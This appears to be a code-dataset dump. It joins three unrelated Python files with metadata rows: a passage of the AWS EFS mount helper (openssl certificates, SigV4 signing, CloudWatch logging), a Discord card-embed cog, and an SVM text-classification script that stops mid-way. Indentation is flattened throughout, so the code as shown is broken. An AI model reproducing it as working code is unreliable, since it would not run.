create_certificate_signing_request(certificate_config, private_key, certificate_signing_request)
not_before = get_certificate_timestamp(current_time, minutes=-NOT_BEFORE_MINS)
not_after = get_certificate_timestamp(current_time, hours=NOT_AFTER_HOURS)
cmd = 'openssl ca -startdate %s -enddate %s -selfsign -batch -notext -config %s -in %s -out %s' % \
(not_before, not_after, certificate_config, certificate_signing_request, certificate)
subprocess_call(cmd, 'Failed to create self-signed client-side certificate')
return current_time.strftime(CERT_DATETIME_FORMAT)
def get_private_key_path():
"""Wrapped for mocking purposes in unit tests"""
return PRIVATE_KEY_FILE
def check_and_create_private_key(base_path=STATE_FILE_DIR):
# Creating RSA private keys is slow, so we will create one private key and allow mounts to share it.
# This means, however, that we have to include a locking mechanism to ensure that the private key is
# atomically created, as mounts occurring in parallel may try to create the key simultaneously.
key = get_private_key_path()
@contextmanager
def open_lock_file():
lock_file = os.path.join(base_path, 'efs-utils-lock')
f = os.open(lock_file, os.O_CREAT | os.O_DSYNC | os.O_EXCL | os.O_RDWR)
try:
lock_file_contents = 'PID: %s' % os.getpid()
os.write(f, lock_file_contents.encode('utf-8'))
yield f
finally:
os.close(f)
os.remove(lock_file)
def do_with_lock(function):
while True:
try:
with open_lock_file():
return function()
except OSError as e:
if e.errno == errno.EEXIST:
logging.info('Failed to take out private key creation lock, sleeping 50 ms')
time.sleep(0.05)
else:
raise
def generate_key():
if os.path.isfile(key):
return
cmd = 'openssl genpkey -algorithm RSA -out %s -pkeyopt rsa_keygen_bits:3072' % key
subprocess_call(cmd, 'Failed to create private key')
read_only_mode = 0o400
os.chmod(key, read_only_mode)
do_with_lock(generate_key)
return key
def create_certificate_signing_request(config_path, private_key, csr_path):
cmd = 'openssl req -new -config %s -key %s -out %s' % (config_path, private_key, csr_path)
subprocess_call(cmd, 'Failed to create certificate signing request (csr)')
def create_ca_conf(config_path, common_name, directory, private_key, date,
region, fs_id, security_credentials, ap_id, client_info):
"""Populate ca/req configuration file with fresh configurations at every mount since SigV4 signature can change"""
public_key_path = os.path.join(directory, 'publicKey.pem')
ca_extension_body = ca_extension_builder(ap_id, security_credentials, fs_id, client_info)
efs_client_auth_body = efs_client_auth_builder(public_key_path, security_credentials['AccessKeyId'],
security_credentials['SecretAccessKey'], date, region, fs_id,
security_credentials['Token']) if security_credentials else ''
efs_client_info_body = efs_client_info_builder(client_info) if client_info else ''
full_config_body = CA_CONFIG_BODY % (directory, private_key, common_name, ca_extension_body,
efs_client_auth_body, efs_client_info_body)
with open(config_path, 'w') as f:
f.write(full_config_body)
return full_config_body
def ca_extension_builder(ap_id, security_credentials, fs_id, client_info):
ca_extension_str = '[ v3_ca ]\nsubjectKeyIdentifier = hash'
if ap_id:
ca_extension_str += '\n1.3.6.1.4.1.4843.7.1 = ASN1:UTF8String:' + ap_id
if security_credentials:
ca_extension_str += '\n1.3.6.1.4.1.4843.7.2 = ASN1:SEQUENCE:efs_client_auth'
ca_extension_str += '\n1.3.6.1.4.1.4843.7.3 = ASN1:UTF8String:' + fs_id
if client_info:
ca_extension_str += '\n1.3.6.1.4.1.4843.7.4 = ASN1:SEQUENCE:efs_client_info'
return ca_extension_str
def efs_client_auth_builder(public_key_path, access_key_id, secret_access_key, date, region, fs_id, session_token=None):
public_key_hash = get_public_key_sha1(public_key_path)
canonical_request = create_canonical_request(public_key_hash, date, access_key_id, region, fs_id, session_token)
string_to_sign = create_string_to_sign(canonical_request, date, region)
signature = calculate_signature(string_to_sign, date, secret_access_key, region)
efs_client_auth_str = '[ efs_client_auth ]'
efs_client_auth_str += '\naccessKeyId = UTF8String:' + access_key_id
efs_client_auth_str += '\nsignature = OCTETSTRING:' + signature
efs_client_auth_str += '\nsigv4DateTime = UTCTIME:' + date.strftime(CERT_DATETIME_FORMAT)
if session_token:
efs_client_auth_str += '\nsessionToken = EXPLICIT:0,UTF8String:' + session_token
return efs_client_auth_str
def efs_client_info_builder(client_info):
efs_client_info_str = '[ efs_client_info ]'
for key, value in client_info.items():
efs_client_info_str += '\n%s = UTF8String:%s' % (key, value)
return efs_client_info_str
def create_public_key(private_key, public_key):
cmd = 'openssl rsa -in %s -outform PEM -pubout -out %s' % (private_key, public_key)
subprocess_call(cmd, 'Failed to create public key')
def subprocess_call(cmd, error_message):
"""Helper method to run shell openssl command and to handle response error messages"""
retry_times = 3
for retry in range(retry_times):
process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
(output, err) = process.communicate()
rc = process.poll()
if rc != 0:
logging.error('Command %s failed, rc=%s, stdout="%s", stderr="%s"' % (cmd, rc, output, err), exc_info=True)
try:
process.kill()
except OSError:
# Silently fail if the subprocess has exited already
pass
else:
return output, err
error_message = '%s, error is: %s' % (error_message, err)
fatal_error(error_message, error_message)
def ca_dirs_check(config, database_dir, certs_dir):
"""Check if mount's database and certs directories exist and if not, create directories (also create all intermediate
directories if they don't exist)."""
if not os.path.exists(database_dir):
create_required_directory(config, database_dir)
if not os.path.exists(certs_dir):
create_required_directory(config, certs_dir)
def ca_supporting_files_check(index_path, index_attr_path, serial_path, rand_path):
"""Recreate all supporting openssl ca and req files if they're not present in their respective directories"""
if not os.path.isfile(index_path):
open(index_path, 'w').close()
if not os.path.isfile(index_attr_path):
with open(index_attr_path, 'w+') as f:
f.write('unique_subject = no')
if not os.path.isfile(serial_path):
with open(serial_path, 'w+') as f:
f.write('00')
if not os.path.isfile(rand_path):
open(rand_path, 'w').close()
def get_certificate_timestamp(current_time, **kwargs):
updated_time = current_time + timedelta(**kwargs)
return updated_time.strftime(CERT_DATETIME_FORMAT)
def get_utc_now():
"""
Wrapped for patching purposes in unit tests
"""
return datetime.utcnow()
def assert_root():
if os.geteuid() != 0:
sys.stderr.write('only root can run mount.efs\n')
sys.exit(1)
def read_config(config_file=CONFIG_FILE):
try:
p = ConfigParser.SafeConfigParser()
except AttributeError:
p = ConfigParser()
p.read(config_file)
return p
def bootstrap_logging(config, log_dir=LOG_DIR):
raw_level = config.get(CONFIG_SECTION, 'logging_level')
levels = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL
}
level = levels.get(raw_level.lower())
level_error = False
if not level:
# delay logging error about malformed log level until after logging is configured
level_error = True
level = logging.INFO
max_bytes = config.getint(CONFIG_SECTION, 'logging_max_bytes')
file_count = config.getint(CONFIG_SECTION, 'logging_file_count')
handler = RotatingFileHandler(os.path.join(log_dir, LOG_FILE), maxBytes=max_bytes, backupCount=file_count)
handler.setFormatter(logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(message)s'))
logger = logging.getLogger()
logger.setLevel(level)
logger.addHandler(handler)
if level_error:
logging.error('Malformed logging level "%s", setting logging level to %s', raw_level, level)
def get_dns_name(config, fs_id):
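# Build the mount target DNS name from the configured dns_name_format; for example a format of
# '{fs_id}.efs.{region}.{dns_name_suffix}' might yield 'fs-deadbeef.efs.us-east-1.amazonaws.com'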
def _validate_replacement_field_count(format_str, expected_ct):
if format_str.count('{') != expected_ct or format_str.count('}') != expected_ct:
raise ValueError('DNS name format has an incorrect number of replacement fields')
dns_name_format = config.get(CONFIG_SECTION, 'dns_name_format')
if '{fs_id}' not in dns_name_format:
raise ValueError('DNS name format must include {fs_id}')
format_args = {'fs_id': fs_id}
expected_replacement_field_ct = 1
if '{region}' in dns_name_format:
expected_replacement_field_ct += 1
format_args['region'] = get_target_region(config)
if '{dns_name_suffix}' in dns_name_format:
expected_replacement_field_ct += 1
config_section = CONFIG_SECTION
region = format_args.get('region')
if region:
region_specific_config_section = '%s.%s' % (CONFIG_SECTION, region)
if config.has_section(region_specific_config_section):
config_section = region_specific_config_section
format_args['dns_name_suffix'] = config.get(config_section, 'dns_name_suffix')
logging.debug("Using dns_name_suffix %s in config section [%s]", format_args.get('dns_name_suffix'), config_section)
_validate_replacement_field_count(dns_name_format, expected_replacement_field_ct)
dns_name = dns_name_format.format(**format_args)
try:
socket.gethostbyname(dns_name)
except socket.gaierror:
fatal_error('Failed to resolve "%s" - check that your file system ID is correct.\nSee %s for more detail.'
% (dns_name, 'https://docs.aws.amazon.com/console/efs/mount-dns-name'),
'Failed to resolve "%s"' % dns_name)
return dns_name
def tls_paths_dictionary(mount_name, base_path=STATE_FILE_DIR):
tls_dict = {
'mount_dir': os.path.join(base_path, mount_name),
# every mount will have its own ca mode assets due to lack of multi-threading support in openssl
'database_dir': os.path.join(base_path, mount_name, 'database'),
'certs_dir': os.path.join(base_path, mount_name, 'certs'),
'index': os.path.join(base_path, mount_name, 'database/index.txt'),
'index_attr': os.path.join(base_path, mount_name, 'database/index.txt.attr'),
'serial': os.path.join(base_path, mount_name, 'database/serial'),
'rand': os.path.join(base_path, mount_name, 'database/.rand')
}
return tls_dict
def get_public_key_sha1(public_key):
# truncating public key to remove the header and footer '-----(BEGIN|END) PUBLIC KEY-----'
with open(public_key, 'r') as f:
lines = f.readlines()
lines = lines[1:-1]
key = ''.join(lines)
key = bytearray(base64.b64decode(key))
# Parse the public key to pull out the actual key material by looking for the key BIT STRING
# Example:
# 0:d=0 hl=4 l= 418 cons: SEQUENCE
# 4:d=1 hl=2 l= 13 cons: SEQUENCE
# 6:d=2 hl=2 l= 9 prim: OBJECT :rsaEncryption
# 17:d=2 hl=2 l= 0 prim: NULL
# 19:d=1 hl=4 l= 399 prim: BIT STRING
cmd = 'openssl asn1parse -inform PEM -in %s' % public_key
output, err = subprocess_call(cmd, 'Unable to ASN1 parse public key file, %s, correctly' % public_key)
key_line = ''
for line in output.splitlines():
if 'BIT STRING' in line.decode('utf-8'):
key_line = line.decode('utf-8')
if not key_line:
err_msg = 'Public key file, %s, is incorrectly formatted' % public_key
fatal_error(err_msg, err_msg)
key_line = key_line.replace(' ', '')
# DER encoding TLV (Tag, Length, Value)
# - the first octet (byte) is the tag (type)
# - the next octets are the length - "definite form"
# - the first octet always has the high order bit (8) set to 1
# - the remaining 127 bits are used to encode the number of octets that follow
# - the following octets encode, as big-endian, the length (which may be 0) as a number of octets
# - the remaining octets are the "value" aka content
#
# For a BIT STRING, the first octet of the value is used to signify the number of unused bits that exist in the last
# content byte. Note that this is explicitly excluded from the SubjectKeyIdentifier hash, per
# https://tools.ietf.org/html/rfc5280#section-4.2.1.2
#
# Example:
# 0382018f00...<subjectPublicKey>
# - 03 - BIT STRING tag
# - 82 - 2 length octets to follow (ignore high order bit)
# - 018f - length of 399
# - 00 - no unused bits in the last content byte
offset = int(key_line.split(':')[0])
key = key[offset:]
num_length_octets = key[1] & 0b01111111
# Exclude the tag (1), length (1 + num_length_octets), and number of unused bits (1)
offset = 1 + 1 + num_length_octets + 1
key = key[offset:]
sha1 = hashlib.sha1()
sha1.update(key)
return sha1.hexdigest()
def create_canonical_request(public_key_hash, date, access_key, region, fs_id, session_token=None):
"""
Create a Canonical Request - https://docs.aws.amazon.com/general/latest/gr/sigv4-create-canonical-request.html
"""
formatted_datetime = date.strftime(SIGV4_DATETIME_FORMAT)
credential = quote_plus(access_key + '/' + get_credential_scope(date, region))
request = HTTP_REQUEST_METHOD + '\n'
request += CANONICAL_URI + '\n'
request += create_canonical_query_string(public_key_hash, credential, formatted_datetime, session_token) + '\n'
request += CANONICAL_HEADERS % fs_id + '\n'
request += SIGNED_HEADERS + '\n'
sha256 = hashlib.sha256()
sha256.update(REQUEST_PAYLOAD.encode())
request += sha256.hexdigest()
return request
def create_canonical_query_string(public_key_hash, credential, formatted_datetime, session_token=None):
canonical_query_params = {
'Action': 'Connect',
# Public key hash is included in canonical request to tie the signature to a specific key pair to avoid replay attacks
'PublicKeyHash': quote_plus(public_key_hash),
'X-Amz-Algorithm': ALGORITHM,
'X-Amz-Credential': credential,
'X-Amz-Date': quote_plus(formatted_datetime),
'X-Amz-Expires': 86400,
'X-Amz-SignedHeaders': SIGNED_HEADERS,
}
if session_token:
canonical_query_params['X-Amz-Security-Token'] = quote_plus(session_token)
# Cannot use urllib.urlencode because it replaces the %s's
return '&'.join(['%s=%s' % (k, v) for k, v in sorted(canonical_query_params.items())])
def create_string_to_sign(canonical_request, date, region):
"""
Create a String to Sign - https://docs.aws.amazon.com/general/latest/gr/sigv4-create-string-to-sign.html
"""
string_to_sign = ALGORITHM + '\n'
string_to_sign += date.strftime(SIGV4_DATETIME_FORMAT) + '\n'
string_to_sign += get_credential_scope(date, region) + '\n'
sha256 = hashlib.sha256()
sha256.update(canonical_request.encode())
string_to_sign += sha256.hexdigest()
return string_to_sign
def calculate_signature(string_to_sign, date, secret_access_key, region):
"""
Calculate the Signature - https://docs.aws.amazon.com/general/latest/gr/sigv4-calculate-signature.html
"""
def _sign(key, msg):
return hmac.new(key, msg.encode('utf-8'), hashlib.sha256)
key_date = _sign(('AWS4' + secret_access_key).encode('utf-8'), date.strftime(DATE_ONLY_FORMAT)).digest()
add_region = _sign(key_date, region).digest()
add_service = _sign(add_region, SERVICE).digest()
signing_key = _sign(add_service, 'aws4_request').digest()
return _sign(signing_key, string_to_sign).hexdigest()
def get_credential_scope(date, region):
return '/'.join([date.strftime(DATE_ONLY_FORMAT), region, SERVICE, AWS4_REQUEST])
def match_device(config, device):
"""Return the EFS id and the remote path to mount"""
try:
remote, path = device.split(':', 1)
except ValueError:
remote = device
path = '/'
if FS_ID_RE.match(remote):
return remote, path
try:
primary, secondaries, _ = socket.gethostbyname_ex(remote)
hostnames = list(filter(lambda e: e is not None, [primary] + secondaries))
except socket.gaierror:
create_default_cloudwatchlog_agent_if_not_exist(config)
fatal_error(
'Failed to resolve "%s" - check that the specified DNS name is a CNAME record resolving to a valid EFS DNS '
'name' % remote,
'Failed to resolve "%s"' % remote
)
if not hostnames:
create_default_cloudwatchlog_agent_if_not_exist(config)
fatal_error(
'The specified domain name "%s" did not resolve to an EFS mount target' % remote
)
for hostname in hostnames:
efs_fqdn_match = EFS_FQDN_RE.match(hostname)
if efs_fqdn_match:
fs_id = efs_fqdn_match.group('fs_id')
expected_dns_name = get_dns_name(config, fs_id)
# check that the DNS name of the mount target matches exactly the DNS name the CNAME resolves to
if hostname == expected_dns_name:
return fs_id, path
else:
create_default_cloudwatchlog_agent_if_not_exist(config)
fatal_error('The specified CNAME "%s" did not resolve to a valid DNS name for an EFS mount target. '
'Please refer to the EFS documentation for mounting with DNS names for examples: %s'
% (remote, 'https://docs.aws.amazon.com/efs/latest/ug/mounting-fs-mount-cmd-dns-name.html'))
def is_nfs_mount(mountpoint):
cmd = ['stat', '-f', '-L', '-c', '%T', mountpoint]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
output, _ = p.communicate()
return output and 'nfs' in str(output)
def mount_tls(config, init_system, dns_name, path, fs_id, mountpoint, options):
if os.path.ismount(mountpoint) and is_nfs_mount(mountpoint):
sys.stdout.write("%s is already mounted, please run 'mount' command to verify\n" % mountpoint)
logging.warning("%s is already mounted, mount aborted" % mountpoint)
return
with bootstrap_tls(config, init_system, dns_name, fs_id, mountpoint, options) as tunnel_proc:
mount_completed = threading.Event()
t = threading.Thread(target=poll_tunnel_process, args=(tunnel_proc, fs_id, mount_completed))
t.daemon = True
t.start()
mount_nfs(dns_name, path, mountpoint, options)
mount_completed.set()
t.join()
def check_unsupported_options(options):
for unsupported_option in UNSUPPORTED_OPTIONS:
if unsupported_option in options:
warn_message = 'The "%s" option is not supported and has been ignored, as amazon-efs-utils relies on a built-in ' \
'trust store.' % unsupported_option
sys.stderr.write('WARN: %s\n' % warn_message)
logging.warning(warn_message)
del options[unsupported_option]
def check_options_validity(options):
if 'tls' in options:
if 'port' in options:
fatal_error('The "port" and "tls" options are mutually exclusive')
if 'tlsport' in options:
try:
int(options['tlsport'])
except ValueError:
fatal_error('tlsport option [%s] is not an integer' % options['tlsport'])
if 'ocsp' in options and 'noocsp' in options:
fatal_error('The "ocsp" and "noocsp" options are mutually exclusive')
if 'accesspoint' in options:
if 'tls' not in options:
fatal_error('The "tls" option is required when mounting via "accesspoint"')
if not AP_ID_RE.match(options['accesspoint']):
fatal_error('Access Point ID %s is malformed' % options['accesspoint'])
if 'iam' in options and 'tls' not in options:
fatal_error('The "tls" option is required when mounting via "iam"')
if 'awsprofile' in options and 'iam' not in options:
fatal_error('The "iam" option is required when mounting with named profile option, "awsprofile"')
if 'awscredsuri' in options and 'iam' not in options:
fatal_error('The "iam" option is required when mounting with "awscredsuri"')
if 'awscredsuri' in options and 'awsprofile' in options:
fatal_error('The "awscredsuri" and "awsprofile" options are mutually exclusive')
def bootstrap_cloudwatch_logging(config, fs_id=None):
if not check_if_cloudwatch_log_enabled(config):
return None
cloudwatchlog_client = get_botocore_client(config, 'logs')
if not cloudwatchlog_client:
return None
cloudwatchlog_config = get_cloudwatchlog_config(config, fs_id)
log_group_name = cloudwatchlog_config.get('log_group_name')
log_stream_name = cloudwatchlog_config.get('log_stream_name')
retention_days = cloudwatchlog_config.get('retention_days')
group_creation_completed = create_cloudwatch_log_group(cloudwatchlog_client, log_group_name)
if not group_creation_completed:
return None
put_retention_policy_completed = put_cloudwatch_log_retention_policy(cloudwatchlog_client, log_group_name, retention_days)
if not put_retention_policy_completed:
return None
stream_creation_completed = create_cloudwatch_log_stream(cloudwatchlog_client, log_group_name, log_stream_name)
if not stream_creation_completed:
return None
return {
'client': cloudwatchlog_client,
'log_group_name': log_group_name,
'log_stream_name': log_stream_name
}
def create_default_cloudwatchlog_agent_if_not_exist(config):
if not check_if_cloudwatch_log_enabled(config):
return None
global CLOUDWATCHLOG_AGENT
if not CLOUDWATCHLOG_AGENT:
CLOUDWATCHLOG_AGENT = bootstrap_cloudwatch_logging(config)
def get_botocore_client(config, service):
if not BOTOCORE_PRESENT:
logging.error('Failed to import botocore, please install botocore first.')
return None
session = botocore.session.get_session()
region = get_target_region(config)
iam_role_name = get_iam_role_name()
if iam_role_name:
credentials, _ = get_aws_security_credentials_from_instance_metadata(iam_role_name)
if credentials:
return session.create_client(service, aws_access_key_id=credentials['AccessKeyId'],
aws_secret_access_key=credentials['SecretAccessKey'],
aws_session_token=credentials['Token'], region_name=region)
return session.create_client(service, region_name=region)
def get_cloudwatchlog_config(config, fs_id=None):
log_group_name = DEFAULT_CLOUDWATCH_LOG_GROUP
if config.has_option(CLOUDWATCH_LOG_SECTION, 'log_group_name'):
log_group_name = config.get(CLOUDWATCH_LOG_SECTION, 'log_group_name')
retention_days = DEFAULT_RETENTION_DAYS
if config.has_option(CLOUDWATCH_LOG_SECTION, 'retention_in_days'):
retention_days = config.get(CLOUDWATCH_LOG_SECTION, 'retention_in_days')
log_stream_name = get_cloudwatch_log_stream_name(fs_id)
return {
'log_group_name': log_group_name,
'retention_days': int(retention_days),
'log_stream_name': log_stream_name
}
def get_cloudwatch_log_stream_name(fs_id=None):
instance_id = get_instance_identity_info_from_instance_metadata('instanceId')
if instance_id and fs_id:
log_stream_name = '%s - %s - mount.log' % (fs_id, instance_id)
elif instance_id:
log_stream_name = '%s - mount.log' % (instance_id)
elif fs_id:
log_stream_name = '%s - mount.log' % (fs_id)
else:
log_stream_name = 'default - mount.log'
return log_stream_name
def check_if_cloudwatch_log_enabled(config):
if config.has_option(CLOUDWATCH_LOG_SECTION, 'enabled'):
return config.getboolean(CLOUDWATCH_LOG_SECTION, 'enabled')
return False
def cloudwatch_create_log_group_helper(cloudwatchlog_client, log_group_name):
cloudwatchlog_client.create_log_group(
logGroupName=log_group_name
)
logging.info('Created cloudwatch log group %s' % log_group_name)
def create_cloudwatch_log_group(cloudwatchlog_client, log_group_name):
try:
cloudwatch_create_log_group_helper(cloudwatchlog_client, log_group_name)
except ClientError as e:
exception = e.response['Error']['Code']
if exception == 'ResourceAlreadyExistsException':
            logging.debug('Log group %s already exists, %s' % (log_group_name, e.response))
return True
elif exception == 'LimitExceededException':
logging.error('Reached the maximum number of log groups that can be created, %s' % e.response)
return False
elif exception == 'OperationAbortedException':
logging.debug('Multiple requests to update the same log group %s were in conflict, %s' % (log_group_name, e.response))
return False
elif exception == 'InvalidParameterException':
logging.error('Log group name %s is specified incorrectly, %s' % (log_group_name, e.response))
return False
else:
handle_general_botocore_exceptions(e)
return False
except NoCredentialsError as e:
logging.warning('Credentials are not properly configured, %s' % e)
return False
except EndpointConnectionError as e:
logging.warning('Could not connect to the endpoint, %s' % e)
return False
except Exception as e:
logging.warning('Unknown error, %s.' % e)
return False
return True
def cloudwatch_put_retention_policy_helper(cloudwatchlog_client, log_group_name, retention_days):
cloudwatchlog_client.put_retention_policy(
logGroupName=log_group_name,
retentionInDays=retention_days
)
logging.debug('Set cloudwatch log group retention days to %s' % retention_days)
def put_cloudwatch_log_retention_policy(cloudwatchlog_client, log_group_name, retention_days):
try:
cloudwatch_put_retention_policy_helper(cloudwatchlog_client, log_group_name, retention_days)
except ClientError as e:
exception = e.response['Error']['Code']
if exception == 'ResourceNotFoundException':
logging.error('Log group %s does not exist, %s' % (log_group_name, e.response))
return False
elif exception == 'OperationAbortedException':
logging.debug('Multiple requests to update the same log group %s were in conflict, %s' % (log_group_name, e.response))
return False
elif exception == 'InvalidParameterException':
logging.error('Either parameter log group name %s or retention in days %s is specified incorrectly, %s'
% (log_group_name, retention_days, e.response))
return False
else:
handle_general_botocore_exceptions(e)
return False
except NoCredentialsError as e:
logging.warning('Credentials are not properly configured, %s' % e)
return False
except EndpointConnectionError as e:
logging.warning('Could not connect to the endpoint, %s' % e)
return False
except Exception as e:
logging.warning('Unknown error, %s.' % e)
return False
return True
def cloudwatch_create_log_stream_helper(cloudwatchlog_client, log_group_name, log_stream_name):
cloudwatchlog_client.create_log_stream(
logGroupName=log_group_name,
logStreamName=log_stream_name
)
logging.info('Created cloudwatch log stream %s in log group %s' % (log_stream_name, log_group_name))
def create_cloudwatch_log_stream(cloudwatchlog_client, log_group_name, log_stream_name):
try:
cloudwatch_create_log_stream_helper(cloudwatchlog_client, log_group_name, log_stream_name)
except ClientError as e:
exception = e.response['Error']['Code']
if exception == 'ResourceAlreadyExistsException':
            logging.debug('Log stream %s already exists in log group %s, %s' % (log_stream_name, log_group_name, e.response))
return True
elif exception == 'InvalidParameterException':
logging.error('Either parameter log group name %s or log stream name %s is specified incorrectly, %s'
% (log_group_name, log_stream_name, e.response))
return False
elif exception == 'ResourceNotFoundException':
logging.error('Log group %s does not exist, %s' % (log_group_name, e.response))
return False
else:
handle_general_botocore_exceptions(e)
return False
except NoCredentialsError as e:
logging.warning('Credentials are not properly configured, %s' % e)
return False
except EndpointConnectionError as e:
logging.warning('Could not connect to the endpoint, %s' % e)
return False
except Exception as e:
logging.warning('Unknown error, %s.' % e)
return False
return True
def cloudwatch_put_log_events_helper(cloudwatchlog_agent, message, token=None):
kwargs = {
'logGroupName': cloudwatchlog_agent.get('log_group_name'),
'logStreamName': cloudwatchlog_agent.get('log_stream_name'),
'logEvents': [
{
'timestamp': int(round(time.time() * 1000)),
'message': message
}
]
}
if token:
kwargs['sequenceToken'] = token
cloudwatchlog_agent.get('client').put_log_events(**kwargs)
def publish_cloudwatch_log(cloudwatchlog_agent, message):
if not cloudwatchlog_agent or not cloudwatchlog_agent.get('client'):
return False
token = get_log_stream_next_token(cloudwatchlog_agent)
try:
cloudwatch_put_log_events_helper(cloudwatchlog_agent, message, token)
except ClientError as e:
exception = e.response['Error']['Code']
if exception == 'InvalidSequenceTokenException':
logging.debug('The sequence token is not valid, %s' % e.response)
return False
elif exception == 'InvalidParameterException':
logging.debug('One of the parameter to put log events is not valid, %s' % e.response)
return False
elif exception == 'DataAlreadyAcceptedException':
logging.debug('The event %s was already logged, %s' % (message, e.response))
return False
elif exception == 'UnrecognizedClientException':
            logging.debug('The most likely cause is an invalid AWS access key ID or secret access key, %s' % e.response)
return False
elif exception == 'ResourceNotFoundException':
logging.error('Either log group %s or log stream %s does not exist, %s'
% (cloudwatchlog_agent.get('log_group_name'), cloudwatchlog_agent.get('log_stream_name'), e.response))
return False
else:
logging.debug('Unexpected error: %s' % e)
return False
except NoCredentialsError as e:
logging.warning('Credentials are not properly configured, %s' % e)
return False
except EndpointConnectionError as e:
logging.warning('Could not connect to the endpoint, %s' % e)
return False
except Exception as e:
logging.warning('Unknown error, %s.' % e)
return False
return True
def cloudwatch_describe_log_streams_helper(cloudwatchlog_agent):
return cloudwatchlog_agent.get('client').describe_log_streams(
logGroupName=cloudwatchlog_agent.get('log_group_name'),
logStreamNamePrefix=cloudwatchlog_agent.get('log_stream_name')
)
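# put_log_events requires the log stream's current uploadSequenceToken, so it is
# looked up via describe_log_streams before every publish.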
def get_log_stream_next_token(cloudwatchlog_agent):
try:
response = cloudwatch_describe_log_streams_helper(cloudwatchlog_agent)
except ClientError as e:
exception = e.response['Error']['Code']
if exception == 'InvalidParameterException':
logging.debug('Either parameter log group name %s or log stream name %s is specified incorrectly, %s'
% (cloudwatchlog_agent.get('log_group_name'), cloudwatchlog_agent.get('log_stream_name'), e.response))
elif exception == 'ResourceNotFoundException':
logging.debug('Either log group %s or log stream %s does not exist, %s'
% (cloudwatchlog_agent.get('log_group_name'), cloudwatchlog_agent.get('log_stream_name'), e.response))
else:
handle_general_botocore_exceptions(e)
return None
except NoCredentialsError as e:
logging.warning('Credentials are not properly configured, %s' % e)
return None
except EndpointConnectionError as e:
logging.warning('Could not connect to the endpoint, %s' % e)
return None
except Exception as e:
logging.warning('Unknown error, %s' % e)
return None
try:
log_stream = response['logStreams'][0]
return log_stream.get('uploadSequenceToken')
except (IndexError, TypeError, KeyError):
pass
return None
def handle_general_botocore_exceptions(error):
exception = error.response['Error']['Code']
if exception == 'ServiceUnavailableException':
logging.debug('The service cannot complete the request, %s' % error.response)
elif exception == 'AccessDeniedException':
logging.debug('User is not authorized to perform the action, %s' % error.response)
else:
logging.debug('Unexpected error: %s' % error)
def main():
parse_arguments_early_exit()
assert_root()
config = read_config()
bootstrap_logging(config)
fs_id, path, mountpoint, options = parse_arguments(config)
logging.info('version=%s options=%s', VERSION, options)
global CLOUDWATCHLOG_AGENT
CLOUDWATCHLOG_AGENT = bootstrap_cloudwatch_logging(config, fs_id)
check_unsupported_options(options)
check_options_validity(options)
init_system = get_init_system()
check_network_status(fs_id, init_system)
dns_name = get_dns_name(config, fs_id)
if 'tls' in options:
mount_tls(config, init_system, dns_name, path, fs_id, mountpoint, options)
else:
mount_nfs(dns_name, path, mountpoint, options)
if '__main__' == __name__:
main()
| 38.560583 | 130 | 0.680535 | 0 | 0 | 5,071 | 0.066117 | 3,928 | 0.051215 | 0 | 0 | 22,517 | 0.293584 |
6a01fe7f065ff8fbb40e8cf44137b52463e1417c | 1,010 | py | Python | upcfcardsearch/c8.py | ProfessorSean/Kasutamaiza | 7a69a69258f67bbb88bebbac6da4e6e1434947e6 | ["MIT"] | null | null | null | upcfcardsearch/c8.py | ProfessorSean/Kasutamaiza | 7a69a69258f67bbb88bebbac6da4e6e1434947e6 | ["MIT"] | null | null | null | upcfcardsearch/c8.py | ProfessorSean/Kasutamaiza | 7a69a69258f67bbb88bebbac6da4e6e1434947e6 | ["MIT"] | null | null | null
import discord
from discord.ext import commands
from discord.utils import get
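# Cog that replies with an embed describing the custom card "Sacrosanct Devouring Pyre".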
class c8(commands.Cog, name="c8"):
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.command(name='Sacrosanct_Devouring_Pyre', aliases=['c8'])
async def example_embed(self, ctx):
embed = discord.Embed(title='Sacrosanct Devouring Pyre',
color=0xBC5A84)
embed.set_thumbnail(url='https://www.duelingbook.com/images/custom-pics/2300000/2308475.jpg')
embed.add_field(name='Status (Archetype)', value='Casual:3/Tournament:3', inline=True)
embed.add_field(name='Type', value='Trap/Normal', inline=False)
embed.add_field(name='Card Effect', value='Tribute 2 monsters, then target 2 monsters; destroy those targets. You can only activate 1 "Sacrosanct Devouring Pyre" per turn.', inline=False)
embed.set_footer(text='Set Code: ANCF')
await ctx.send(embed=embed)
def setup(bot: commands.Bot):
    bot.add_cog(c8(bot))
| 43.913043 | 195 | 0.687129 | 875 | 0.866337 | 0 | 0 | 769 | 0.761386 | 697 | 0.690099 | 351 | 0.347525
6a023f8c8af70de4e0b8e937c5773e7da489fab5 | 2,627 | py | Python | SVMmodel_withSKF.py | tameney22/DCI-Capstone | 6f59541f16030bfa3f0a706fd9f0e4394e1ee974 | ["MIT"] | null | null | null | SVMmodel_withSKF.py | tameney22/DCI-Capstone | 6f59541f16030bfa3f0a706fd9f0e4394e1ee974 | ["MIT"] | null | null | null | SVMmodel_withSKF.py | tameney22/DCI-Capstone | 6f59541f16030bfa3f0a706fd9f0e4394e1ee974 | ["MIT"] | null | null | null
"""
This script is where the preprocessed data is used to train the SVM model to
perform the classification. I am using Stratified K-Fold Cross Validation to
prevent bias and/or any imbalance that could affect the model's accuracy.
REFERENCE: https://medium.com/@bedigunjit/simple-guide-to-text-classification-nlp-using-svm-and-naive-bayes-with-python-421db3a72d34
"""
import numpy as np
import pandas as pd
from sklearn import model_selection, svm
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import LabelEncoder
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import StratifiedKFold
# Open preproccessed csv
df = pd.read_csv("preprocessed.csv", index_col=0)
print(df.head())
print("SPLITTING TRAIN-TEST")
x = df["Text"]
y = df["PublicationTitle"]
train_x, test_x, train_y, test_y = model_selection.train_test_split(
df["Text"], df["PublicationTitle"], test_size=0.3)
# Label encode the target variable to transform categorical data of string
# type into numerical values the model can understand
encoder = LabelEncoder()
# train_y = encoder.fit_transform(train_y)
# test_y = encoder.fit_transform(test_y)
# Word vectorization
# turning a collection of text documents into numerical feature vectors
# We are using Term Frequency - Inverse Document
tfidf_vect = TfidfVectorizer(max_features=5000)
tfidf_vect.fit(df["Text"])
